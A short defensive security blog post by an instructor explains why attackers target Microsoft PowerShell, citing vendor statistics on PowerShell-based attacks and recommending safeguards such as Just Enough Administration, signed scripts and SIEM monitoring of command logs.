PowerShell is here to stay, but who’s in CMD?
By Matthew McDonell, Full-Time Instructor, SecureSet Denver
Many would agree that home burglars tend to choose their targets based on two factors: the value of the items they can potentially steal and the level of security a home possesses. An empty T.V. box by a back door or a first story window that’s always left half cracked are enticing invitations. Conversely, deterrents such as a home alarm sign on the front lawn, or the barks of a large dog coming from within the home, may cause a burglar to continue their search for an easy target.
Like home burglars, many threat actors (bad hackers) choose their ventures based on the same two factors: the value of the target and the level of security employed. Generally speaking, the more deterrents that a network utilizes, the less likely a hacker will attempt a breach. While hackers may choose more difficult targets due to motives other than the two that were mentioned, many of them search for the path that yields the least resistance and the greatest potential for a big payoff.
Microsoft PowerShell has become a habitual target for threat actors. While PowerShell has seen security developments in recent years, it still remains a prime target for hacking techniques such as Pass the hash and Brute-force.
What is PowerShell?
Microsoft PowerShell is a powerful scripting language and shell framework that is primarily used on Windows computers and can now can be installed on Apple and Linux systems. PowerShell has been around for more than 10 years and, at some point, will replace the default command prompt on Windows. By default, PowerShell has been installed in all modern Windows Operating Systems since Windows 7 and Windows Server 2008R2. It is also present in all newer versions from Microsoft. PowerShell is here to stay.
The current state of things.
Almost all system administrators use PowerShell scripts for daily tasks, pulling information from Active Directory or installing/removing software from managed systems in enterprise networks.
While PowerShell is a useful tool for these administrative tasks, attackers are regularly using the scripting language to create threats. A recent report from Symantec shows that 95.4% of the scripts they analyzed were malicious.
Carbon Black, an endpoint security software company based in Massachusetts, found that in 2016, threat actors used PowerShell to launch their attacks in 38% of over 1,000 security incidents in 28 firms. Nearly one-third (31%) of respondents reported receiving no security alerts, prior to Carbon Black’s investigation of PowerShell-related incidents, indicating that adversaries are successfully using PowerShell to enter and remain undetected in a company’s system.
87% of the attacks leveraging PowerShell were commodity malware attacks such as click-fraud, fake antivirus, ransomware, and opportunistic malware. Social engineering remains the favored technique for delivering PowerShell-based attacks according to interviews with Carbon Black partners.
How do we prevent these types of attacks?
The increase in these types of attacks requires that Blue Teams get educated on how to see the them happen and how to better understand the attacks, in order to prevent them in the first place. It is far better to prevent breaches than to react to them. If the breach has happened, it is likely too late and the damage has already been done, whether it was denial of service, ransomware, data exfiltration or one of the many other types of attacks.
Microsoft Server 2016 was recently released with Just Enough Administration (JEA), which follows the Least Privilege model. We can use service accounts on the systems that need to run these scripts. This practice will help to stop lateral attacks from happening since these accounts cannot be used to log into systems. This also allows us to reduce the permissions of that account.
We can also limit the cmdlets, functions, and external commands that service accounts run with JEA. In addition, Set-ExecutionPolicy, requires scripts to be digitally signed before execution of the PowerShell script. You could also have a SIEM server monitor the transcripts and logs in order to show you exactly which commands a user/administrator is executing during their session. Set up properly, it will fire off alerts or notifications when users/administrators are running unauthorized commands or scripts.
Great power and great responsibility
PowerShell isn’t going anywhere, and neither are its malicious operators. Just like a homeowner investing in an alarm system, a greater budgetary emphasis on a cybersecurity team will dramatically improve an enterprise’s chances of preventing advanced cyber-attacks and a catastrophic loss of assets. These organizations must provide their security teams with the proper education, tools and personnel needed to mount an effective cyber-defense strategy.
In the end, knowledge is power, and an advanced understanding of this PowerShell is the first step towards preventing a leveraged attack.
